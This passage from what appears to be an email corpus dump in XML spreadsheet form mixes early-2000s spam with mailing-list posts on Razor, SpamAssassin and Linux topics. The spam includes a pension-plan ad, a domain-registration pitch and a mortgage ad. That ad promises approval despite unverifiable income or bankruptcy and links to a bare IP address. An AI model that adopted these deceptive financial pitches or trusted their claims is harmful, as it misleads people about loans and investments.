 bgcolor=3D"#FFFFFF" bordercolor=3D"#000000" align=3D"center"&gt;
   &lt;tr&gt;=20
     &lt;td width=3D"100%" height=3D"17" =
 background=3D"http://iiq.us/images/4s/20011105-5a.gif"&gt;=20
       &lt;table border=3D"0" width=3D"100%" height=3D"499" =
 cellpadding=3D"3" cellspacing=3D"3"&gt;
         &lt;tr&gt;=20
           &lt;td width=3D"100%" height=3D"21" align=3D"center"&gt;&lt;img =
 border=3D"0" src=3D"http://iiq.us/images/4s/20011105-1a.gif" =
 width=3D"550" height=3D"110" alt=3D'421(i) A Fully Insured, Tax =
 Qualified Retirement Plan!'&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td width=3D"100%" height=3D"28" valign=3D"top"&gt;=20
             &lt;table border=3D"0" width=3D"102%" cellpadding=3D"2" =
 height=3D"158"&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"28%" height=3D"121" valign=3D"bottom"&gt;&lt;img =
 border=3D"0" src=3D"http://iiq.us/images/4s/20011105-3a.gif" =
 width=3D"135" height=3D"129"&gt;&lt;/td&gt;
                 &lt;td width=3D"21%" height=3D"121" valign=3D"bottom" =
 align=3D"center"&gt;&lt;img border=3D"0" =
 src=3D"http://iiq.us/images/4s/20011105-6a.gif" width=3D"50" =
 height=3D"52"&gt;&lt;/td&gt;
                 &lt;td width=3D"17%" height=3D"121" valign=3D"bottom" =
 align=3D"center"&gt;&lt;img border=3D"0" =
 src=3D"http://iiq.us/images/4s/20011105-6a.gif" width=3D"50" =
 height=3D"52"&gt;&lt;/td&gt;
                 &lt;td width=3D"16%" height=3D"121" valign=3D"bottom" =
 align=3D"center"&gt;&lt;img border=3D"0" =
 src=3D"http://iiq.us/images/4s/20011105-6a.gif" width=3D"50" =
 height=3D"52"&gt;&lt;/td&gt;
                 &lt;td width=3D"20%" height=3D"121" valign=3D"bottom" =
 align=3D"center"&gt;&lt;img border=3D"0" =
 src=3D"http://iiq.us/images/4s/20011105-6a.gif" width=3D"50" =
 height=3D"52"&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"28%" height=3D"21" =
 align=3D"center"&gt;&lt;b&gt;&lt;font face=3D"Arial" size=3D"4" =
 color=3D"#800000"&gt;$353,253*&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td width=3D"21%" height=3D"21" =
 align=3D"center"&gt;&lt;b&gt;&lt;font face=3D"Arial" size=3D"4" =
 color=3D"#800000"&gt;$145,496*&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td width=3D"17%" height=3D"21" =
 align=3D"center"&gt;&lt;b&gt;&lt;font face=3D"Arial" size=3D"4" =
 color=3D"#800000"&gt;$40,000&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td width=3D"16%" height=3D"21" =
 align=3D"center"&gt;&lt;b&gt;&lt;font face=3D"Arial" size=3D"4" =
 color=3D"#800000"&gt;$30,000&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td width=3D"20%" height=3D"21" =
 align=3D"center"&gt;&lt;b&gt;&lt;font face=3D"Arial" size=3D"4" =
 color=3D"#800000"&gt;$11,000&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"28%" height=3D"21" =
 align=3D"center"&gt;&lt;b&gt;&lt;font face=3D"Arial" size=3D"2" =
 color=3D"#000000"&gt;=A7412(i)&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td width=3D"21%" height=3D"21" =
 align=3D"center"&gt;&lt;b&gt;&lt;font face=3D"Arial" size=3D"2" =
 color=3D"#000000"&gt;Defined Benefit&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td width=3D"17%" height=3D"21" =
 align=3D"center"&gt;&lt;b&gt;&lt;font face=3D"Arial" size=3D"2" =
 color=3D"#000000"&gt;Profit Sharing&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td width=3D"16%" height=3D"21" =
 align=3D"center"&gt;&lt;b&gt;&lt;font face=3D"Arial" size=3D"2" =
 color=3D"#000000"&gt;SEP&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td width=3D"20%" height=3D"21" =
 align=3D"center"&gt;&lt;b&gt;&lt;font face=3D"Arial" size=3D"2" =
 color=3D"#000000"&gt;401(K)&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td width=3D"100%" height=3D"4" valign=3D"top"&gt;=20
             &lt;table border=3D"0" width=3D"100%" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"100%" bgcolor=3D"#006600"&gt;&lt;img border=3D"0" =
 src=3D"http://iiq.us/images/4s/spacer.gif" width=3D"2" =
 height=3D"2"&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td width=3D"100%" height=3D"28" valign=3D"top" =
 align=3D"center"&gt;&lt;img border=3D"0" =
 src=3D"http://iiq.us/images/4s/20011105-2a.gif" width=3D"542" =
 height=3D"29" alt=3D"Designed For Business Owners Over Age 50"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td width=3D"100%" height=3D"28" valign=3D"top"&gt; &lt;b&gt;&lt;font =
 face=3D"Arial" size=3D"3"&gt;=20
             &amp;#149;&amp;nbsp; Contributions Are 100% Tax Deductible&lt;br&gt;&lt;br&gt;
             &amp;#149;&amp;nbsp; US Government Approved ERISA Pension Plan Since =
 1974&lt;br&gt;&lt;br&gt;
             &amp;#149;&amp;nbsp; Up To 90% of The Benefit Goes Directly To The =
 Business Owner&lt;/font&gt;&lt;/b&gt;=20
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td width=3D"100%" height=3D"24" align=3D"center"&gt;=20
             &lt;b&gt;&lt;font color=3D"#006600" face=3D"Times New Roman" =
 size=3D"5"&gt;&lt;i&gt;Make Your Client's Retirement Dreams Come =
 True!&lt;/i&gt;&lt;/font&gt;&lt;/b&gt;=20
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td width=3D"100%" height=3D"13"&gt;=20
             &lt;table border=3D"0" width=3D"100%" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"100%" bgcolor=3D"#006600"&gt;&lt;img border=3D"0" =
 src=3D"http://iiq.us/images/4s/spacer.gif" width=3D"2" =
 height=3D"2"&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td width=3D"100%" height=3D"24" align=3D"center"&gt;=20
             &lt;b&gt;&lt;font face=3D"Times New Roman" size=3D"4" =
 color=3D"#666666"&gt;For a personalized proposal, please call the pension =
 department:&lt;/font&gt;&lt;/b&gt;=20
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td width=3D"100%" height=3D"38" align=3D"center"&gt; &lt;b&gt;&lt;font =
 face=3D"Times New Roman" size=3D"6" =
 color=3D"#006600"&gt;1-800-235-7949&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td width=3D"100%" height=3D"28" align=3D"center"&gt;=20
             &lt;b&gt;&lt;font face=3D"Times New Roman" size=3D"4" =
 color=3D"#666666"&gt;Or e-mail your request to us at: &lt;a =
 href=3D"mailto:pensions@fsfginc.com"&gt;pensions@fsfginc.com&lt;/a&gt;&lt;/font&gt;&lt;/b&gt; =
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td width=3D"100%" height=3D"4"&gt;=20
             &lt;table border=3D"0" width=3D"100%" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"100%" bgcolor=3D"#006600"&gt;&lt;img border=3D"0" =
 src=3D"http://iiq.us/images/4s/spacer.gif" width=3D"2" =
 height=3D"2"&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td width=3D"100%" height=3D"107"&gt;=20
             &lt;p align=3D"center"&gt;&lt;img border=3D"0" =
 src=3D"http://iiq.us/images/4s/20011105-4a.gif" width=3D"330" =
 height=3D"105"&gt;&lt;br&gt;
               &lt;font color=3D"#333333"&gt;&amp;quot; Innovative Solutions For =
 Changing Economic Climates&amp;quot;&lt;/font&gt;=20
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td width=3D"100%" height=3D"107"&gt;=20
             &lt;table width=3D"100%" bgcolor=3D"#006600"&gt;
               &lt;tr&gt;=20
                 &lt;form method=3D"post" =
 action=3D"http://65.217.159.103/response/response.asp"&gt;
                   &lt;td&gt;=20
                     &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"2" align=3D"center" bgcolor=3D"#ffffff"&gt;
                       &lt;tr bgcolor=3D"#FFFFFF"&gt;=20
                         &lt;td colspan=3D"5" align=3D"center"&gt;&lt;font =
 size=3D"2" face=3D"Arial, Helvetica, sans-serif"&gt;Please fill out the =
 form below for more information&lt;/font&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr bgcolor=3D"#FFFFFF"&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;Name:&lt;/font&gt;&lt;/td&gt;
                         &lt;td colspan=3D"4"&gt;&lt;input type=3D"text" =
 name=3D"contactname" size=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr bgcolor=3D"#FFFFFF"&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;E-mail:&lt;/font&gt;&lt;/td&gt;
                         &lt;td colspan=3D"4"&gt;&lt;input type=3D"text" =
 name=3D"email" size=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr bgcolor=3D"#FFFFFF"&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;Phone:&lt;/font&gt;&lt;/td&gt;
                         &lt;td colspan=3D"4"&gt;&lt;input type=3D"text" =
 name=3D"phone" size=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr bgcolor=3D"#FFFFFF"&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;City:&lt;/font&gt;&lt;/td&gt;
                         &lt;td width=3D"30%"&gt;&lt;input type=3D"text" =
 name=3D"city" size=3D"20"&gt;&lt;/td&gt;
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;State:&lt;/font&gt;&lt;/td&gt;
                         &lt;td width=3D"20%"&gt;&lt;input type=3D"text" =
 name=3D"state" size=3D"2"&gt;&lt;/td&gt;
                         &lt;td rowspan=3D"2" align=3D"center" =
 valign=3D"middle"&gt;&lt;img src=3D"http://iiq.us/images/q2.gif" width=3D"43" =
 height=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr bgcolor=3D"#FFFFFF"&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td width=3D"30%" colspan=3D'3'&gt;=20
                           &lt;input type=3D"submit" name=3D"btnsubmit" =
 value=3D"Submit"&gt;
                           &lt;input type=3D"hidden" =
 name=3D"hdnRecipientTxt" value=3D"pensions@fsfginc.com"&gt;
                           &lt;input type=3D"hidden" name=3D"hdnSubjectTxt" =
 value=3D"Four Seasons Ad Inquiry"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                     &lt;/table&gt;
                   &lt;/td&gt;
                 &lt;input type=3D'hidden' name=3D'SentTo' value=3D'304704'&gt;
 &lt;/form&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td width=3D"100%" height=3D"1"&gt;=20
             &lt;table border=3D"0" width=3D"100%" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"100%" bgcolor=3D"#006600"&gt;&lt;img border=3D"0" =
 src=3D"http://iiq.us/images/4s/spacer.gif" width=3D"2" =
 height=3D"2"&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td width=3D"100%" height=3D"40" align=3D"center"&gt;=20
             &lt;font face=3D"Times New Roman" =
 size=3D"3"&gt;&lt;b&gt;1-800-235-7949&amp;nbsp;&amp;nbsp;&amp;nbsp;Fax: 856-596-9309&lt;/b&gt;&lt;br&gt;
             &lt;a =
 href=3D"mailto:pensions@fsfginc.com"&gt;pensions@fsfginc.com&lt;/a&gt;&amp;nbsp;&amp;nbsp;=
 &amp;nbsp;&lt;a href=3D"http://www.fsfginc.com"&gt;www.fsfginc.com&lt;/a&gt;&lt;/font&gt;=20
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;&lt;img =
 src=3D"http://iiq.us/images/4s/20020122-3a.gif" width=3D"181" =
 height=3D"86" alt=3D"American National Independent Marketing"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td width=3D"100%" height=3D"21" align=3D"center"&gt;=20
             &lt;p&gt;&lt;font color=3D"#000000" face=3D"Arial" size=3D"1"&gt;* =
 Assumes=20
               55 year old making a maximum tax deductible =
 contribution.&lt;/font&gt;&lt;/p&gt;
             &lt;font face=3D"Verdana" size=3D"1"&gt;=20
             &lt;p&gt;We don't want anybody to receive our mailings=20
               who does not wish to receive them. This is professional=20
               communication sent to insurance professionals. To be =
 removed from=20
               this mailing list, DO NOT REPLY to this message. Instead, =
 go here: =20
               &lt;a =
 href=3D"http://www.InsuranceIQ.com/optout"&gt;http://www.InsuranceIQ.com/opt=
 out&lt;/a&gt;&lt;br&gt;
               &lt;a href=3D'http://www.insiq.com/legal.htm'&gt;Legal =
 Notice&lt;/a&gt;&lt;/p&gt;
             &lt;/font&gt;=20
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_4103D_01C25725.29EA69B0--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: My OS X Keynote
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85534676
 Date: Not supplied
 I spoke at the Mac OS X conference in Santa Clara last week. It was a really 
 fun event, and it was great meeting a lot of people whom I previously knew only 
 through email, like Rael Dornfest, Danny O'Brien, and Glenn Fleishman. Here's 
 the talk I gave. Link[1] Discuss[2]
 [1] http://boingboing.net/gadgets.html
 [2] http://www.quicktopic.com/16/H/SLVudz57pyHb
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [Razor-users] Reliability of the razor servers?
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_0014_01C23C69.66A70650
 Content-Type: text/plain;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 I use a perl script that disables Razor for thirty minutes any time it =
 times out.  Not a true fix, but a workaround.
 Fox
   ----- Original Message -----=20
   From: Daniel Higgins=20
   To: razor-users@example.sourceforge.net=20
   Sent: Monday, August 05, 2002 9:49 AM
   Subject: [Razor-users] Reliability of the razor servers?
   ok so after waiting all this time before upgrading to V2 (just did it =
 this morning because V1 isn't effective at all anymore) i ran into =
 problems with reliability of the servers. it took me about half an hour =
 to do a razor-admin -create and razor-admin -register constantly =
 retrying because it kept timing out
   connect1: nextserver: Could not get valid info from Discovery Servers
   is it a problem just now or is that standard issue? up until now i've =
 been advocating razor to all, but i it starts to have reliability issues =
 we might as well look for another way to catch the spam, we can't afford =
 to have one anti spam trick, no matter how effective, bog down the =
 entire mail server
   --
   Daniel Higgins
   Netcommunications Inc.
 ------=_NextPart_000_0014_01C23C69.66A70650
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;
 &lt;META http-equiv=3DContent-Type content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;META content=3D"MSHTML 6.00.2600.0" name=3DGENERATOR&gt;
 &lt;STYLE&gt;&lt;/STYLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY bgColor=3D#ffffff&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;I use a perl script that disables Razor =
 for thirty=20
 minutes any time it times out.&amp;nbsp; Not a true fix, but a=20
 workaround.&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;Fox&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;BLOCKQUOTE dir=3Dltr=20
 style=3D"PADDING-RIGHT: 0px; PADDING-LEFT: 5px; MARGIN-LEFT: 5px; =
 BORDER-LEFT: #000000 2px solid; MARGIN-RIGHT: 0px"&gt;
   &lt;DIV style=3D"FONT: 10pt arial"&gt;----- Original Message ----- &lt;/DIV&gt;
   &lt;DIV=20
   style=3D"BACKGROUND: #e4e4e4; FONT: 10pt arial; font-color: =
 black"&gt;&lt;B&gt;From:&lt;/B&gt;=20
   &lt;A title=3Ddhiggins@netc.net href=3D"mailto:dhiggins@netc.net"&gt;Daniel =
 Higgins&lt;/A&gt;=20
   &lt;/DIV&gt;
   &lt;DIV style=3D"FONT: 10pt arial"&gt;&lt;B&gt;To:&lt;/B&gt; &lt;A=20
   title=3Drazor-users@lists.sourceforge.net=20
   =
 href=3D"mailto:razor-users@lists.sourceforge.net"&gt;razor-users@lists.sourc=
 eforge.net&lt;/A&gt;=20
   &lt;/DIV&gt;
   &lt;DIV style=3D"FONT: 10pt arial"&gt;&lt;B&gt;Sent:&lt;/B&gt; Monday, August 05, 2002 =
 9:49=20
   AM&lt;/DIV&gt;
   &lt;DIV style=3D"FONT: 10pt arial"&gt;&lt;B&gt;Subject:&lt;/B&gt; [Razor-users] =
 Reliability of the=20
   razor servers?&lt;/DIV&gt;
   &lt;DIV&gt;&lt;BR&gt;&lt;/DIV&gt;
   &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;ok so after waiting all this time =
 before=20
   upgrading to V2 (just did it this morning because V1 isn't effective =
 at all=20
   anymore) i ran into problems with reliability of the servers. it took =
 me about=20
   half an hour to do a razor-admin -create and razor-admin -register =
 constantly=20
   retrying because it kept timing out&lt;/FONT&gt;&lt;/DIV&gt;
   &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
   &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;connect1: nextserver: Could not get =
 valid info=20
   from Discovery Servers&lt;/FONT&gt;&lt;/DIV&gt;
   &lt;DIV&gt;&amp;nbsp;&lt;/DIV&gt;
   &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;is it a problem just now or is that =
 standard=20
   issue? up until now i've been advocating razor to all, but i it starts =
 to have=20
   reliability issues we might as well look for another way to catch the =
 spam, we=20
   can't afford to have one anti spam trick, no matter how effective, bog =
 down=20
   the entire mail server&lt;/FONT&gt;&lt;/DIV&gt;
   &lt;DIV&gt;&amp;nbsp;&lt;/DIV&gt;
   &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;--&lt;BR&gt;Daniel =
 Higgins&lt;BR&gt;Netcommunications=20
   Inc.&lt;/FONT&gt;&lt;/DIV&gt;&lt;/BLOCKQUOTE&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 ------=_NextPart_000_0014_01C23C69.66A70650--
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">On 20 Jul 2002 17:17:59 -0500, Chris Weyl &lt;cweyl@mindspring.com&gt; wrote:
 &gt; Just a quick question....  does anyone know of a public Ximian apt/rpm
 &gt; repository?
 &gt; 
 &gt; (I know, I know....  but some ppl kinda like it:-))
     Yeah, I'm one of them.  Ximian, if it could be installed from Apt would be sweet- the graphics are done very, very well.  The usability is actually higher than most other environments.  But their installer really sucks.
     If you find/setup one (and figure out how to install it) let me know.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</si>
  <si>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Subject: New Blog Category: Yahoo
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000191.html
 Date: 2002-09-25T22:31:04-08:00
 I've added a new blog category: Yahoo. Why? Because occasionally I post stuff 
 about work, so I might as well categorize. Plus, some private e-mail has 
 convinced me that it might be a good idea. (You know who you are....
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: new extensions now only $14.95
</t>
  </si>
  <si>
    <t xml:space="preserve">REGISTER DOMAINS FOR JUST $14.95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http://www.domainsforeveryone.com/ today for more info.
 Register your domain name today for just $14.95 at: http://www.domainsforeveryone.com/  Registration fees include full access to an easy-to-use control panel to manage your domain name in the future.
 Sincerely,
 Domain Administrator
 Domains For Everyone
 To remove your email address from further promotional mailings from this company, click here:
 http://www.centralremovalservice.com/cgi-bin/domain-remove.cgi
 (f4)5241SxzP1-426eVQm2568RURF1-685fOOl31
</t>
  </si>
  <si>
    <t xml:space="preserve">Martin:
 &gt; Yes, confirming what I said in my last message. Ah! I see where the problem
 &gt; lies! You seem to be labouring under the misapprehension that Zimbabwe and
 &gt; Zambia are the same country.
 &gt;
 No, that would be rather silly. There are conflicting reports on whether
 Zambia is prepared to accept milled GM grain or not - and, from reports from
 various sources, considerable debate within that country. There's complex
 issues, not all of which can be dismissed by blaming those nasty
 environmentalists, which was my original point.
 TimC
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 4 DVDs Free +s&amp;p Join Now
 http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">At 2:55 PM -0400 on 7/23/02, Win Treese wrote:
 &gt; This should actually be easy to test experimentally: compare the results
 &gt; of having someone call up and say, "Can you show us how to do X for this
 &gt; project we're working on?" with those of having someone summoned by a
 &gt; knowledge management project to explain how to do X for the knowledge
 &gt; archives.
 About the only way I've heard of something like this working was back in
 the Eighties, when management poster-child QuadGraphics used to have the
 maxim "you can't get promoted unless you teach someone your job".
 That might do the trick, though I don't know what happened to QuadGraphics...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</si>
  <si>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Subject: Re: [SAtalk] Yeah right... If spamassassin was looking through th
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Robert Strickler said:
 &gt; Looks like we need an identity stamp in the X-Spam headers so that SA only
 &gt; accepts headers from authorized sources.
 Well, SpamAssassin will just ignore any old X-Spam-whatever headers
 it finds, so that cannot be used to get around the filter.
 --j.
 -------------------------------------------------------
 In remembrance
 www.osdn.com/911/
 _______________________________________________
 Spamassassin-talk mailing list
 Spamassassin-talk@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/spamassassin-talk
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: How are you?8456
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;&lt;body&gt;&lt;pre&gt;
 ______________________________________________________________________
 ______________________________________________________________________
 FILL OUT OUR SHORT APPLICATION FOR AN UNBELIEVABLE 4.1% MORTGAGE (APR)
   () HOME REFINANCING
   () HOME IMPROVEMENT
   () DEBT-CONSOLIDATION
   () CASH-OUT
 Please Click &lt;a href=3D"http://210.192.111.24/mg/index.html"&gt;HERE&lt;/a&gt; 
 for our short application. 
 The following are NO problem and will not stop you from getting the 
 financing you need:
   *** Can't show income
   *** Self-Employed
   *** Credit Problems
   *** Recent Bankruptcy
   *** Unconventional Loan 
 We have hundreds of loan programs available and work with hundreds 
 of lenders, so no matter which of our 50 states you live in, we
 likely have a program that could meet your needs.
 Please Click &lt;a href=3D"http://210.192.111.24/mg/index.html"&gt;HERE&lt;/a&gt; 
 for our short application. 
 * We DO NOT resell or disseminate your email address. You are NOT required
 to enter your SSN. This is a legitimate offer from legitimate mortgage
 companies.
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
 Note: We are licensed in all 50 U.S. States.
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
 To be REMOVED from future mailings click &lt;a href=3D"mailto:remove@sitecrit=
 ic.net?subject=3Dremove"&gt;HERE&lt;/a&gt; or send an e-mail to remove@sitecritic.n=
 et.
 We will NEVER intentionally email you again. Thank You.
 ______________________________________________________________________
 ______________________________________________________________________
 &lt;/pre&gt;&lt;/body&gt;&lt;/html&gt;
 .........................................
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, Aug 02, 2002 at 09:40:52AM +0100, Padraig Brady mentioned:
 &gt; &gt; Most likely.
 &gt; &gt; Hey...is that one of my nice wai-yip stuffed ones ?
 &gt; Ah, I new I had one extra.
 &gt; Ransom is a pint.
  Well, as you seem to be mating them up in Longford, keep it till it has
 chicks, and send me two :)
 Kate
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Googlenews
</t>
  </si>
  <si>
    <t xml:space="preserve">
 The further googlization of my screentimes....News...No not just
 news...google news. I love the line that tells me how fresh/stale the news
 item is....phreaking cewl.
 So far I like the content range.
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "J" == Justin Mason &lt;jm@jmason.org&gt; writes:
     J&gt; What about Tibetan Buddhism BTW?  They seem like an awfully
     J&gt; nice bunch of chaps (and chapesses).
 Yes, them too.  When wolves attack their sheep, they coral the wolf
 into a quarry and then throw rocks from the surrounding cliffs so
 that "no one will know who killed the wolf"
 In Samskar, before the Chinese arrived, there had not been a killing
 in over 2000 years, and the last recorded skirmish, over rights to
 a water hole, had happened several generations ago.
 -- 
 Gary Lawrence Murphy - garym@teledyn.com - TeleDynamics Communications
  - blog: http://www.auracom.com/~teledyn - biz: http://teledyn.com/ -
   "Computers are useless. They can only give you answers." (Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- saved from url=3D(0022)http://internet.e-mail --&gt;
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;
 &lt;META http-equiv=3DContent-Type content=3D"text/html; charset=3Diso-8859-1=
 "&gt;
 &lt;/HEAD&gt;
 &lt;BODY&gt;
 &lt;TABLE height=3D400 cellSpacing=3D0 cellPadding=3D0 width=3D450 align=3Dce=
 nter border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD colSpan=3D2&gt;&lt;A href=3D"http://marketing-fashion.com/user0201/index=
 asp?Afft=3DQM12"&gt;&lt;IMG height=3D38 src=3D"http://61.129.68.17/mortgage/h1.=
 gif" width=3D450 border=3D0&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD width=3D138 height=3D178&gt;&lt;A href=3D"http://marketing-fashion.com/u=
 ser0201/index.asp?Afft=3DQM12"&gt;&lt;IMG height=3D178 src=3D"http://61.129.68.1=
 7/mortgage/bullets.gif" width=3D138 border=3D0&gt;&lt;/A&gt;&lt;/TD&gt;
     &lt;TD width=3D312 height=3D178&gt;&lt;A href=3D"http://marketing-fashion.com/u=
